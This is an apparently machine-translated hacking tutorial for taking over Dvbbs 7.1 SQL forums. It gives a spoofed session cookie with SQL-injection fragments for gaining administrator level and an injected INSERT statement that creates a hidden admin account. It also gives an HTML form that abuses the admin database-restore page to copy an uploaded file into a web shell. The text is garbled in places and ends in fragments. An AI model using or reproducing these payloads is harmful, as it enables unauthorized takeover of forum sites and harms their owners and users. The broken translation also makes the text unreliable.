The latest dvbbs 7.1sql privilege shell

Dvbbs 7.1 skips the endless loop. The linzi method can only have one management permission, but it is only a beginner's level.

If it is an SQL version, it is difficult to crack the database. In fact, it seems that you only need to capture the SESSION and do not log on to any user.

During spoofing, do not disable the fake ie.

This is an endless loop SESSION:

ASPSESSIONIDQCTRTQAC = rjnbjlckhgddpnaaiockgcj

Add or replace it with the cookie bar of a spoofed browser.

List = list5 + and + 1% 3D2 = 1 & list5 + and + 1% 3D1 = 1 & list1 + and + 1% 3D2 = 1 & list1 + and + 1% 3D1 = 1 & list3 + and + 1% 3D2 = 1 & list3 + and + 1% 3D1 = 1; ASPSESSIONIDQCTRTQAC = rjnbjlckhgddpnaaiockgcj

Then click any Plate

You can find that the users you cheat and the levels are administrators.

The background administrator can use the user rewards to join

Test', '2017. 0.0.1 ', 5); insert into dv_admin (username, [password], flag, adduser) values ('jinsdb', '4ac646c9e65a1769', '1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ', 'jinsdb ');--

Dvbbs7.1 SQL background shell

<Form action = "http: // 127.0.0.1/bbs/admin/data. asp? Act... t = Restore "method =" post ">

<P> location of the uploaded file: <input name = "Dbpath" type = "text" size = "80"> </p>

<P> location to be copied: <input name = "backpath" type = "text" size = "80"> </p>

<P> <input type = "submit" value = "submit"> </p>

</Form>

It seems that 7.1 of usercookies are just a fake.

No need

You can also use

Funny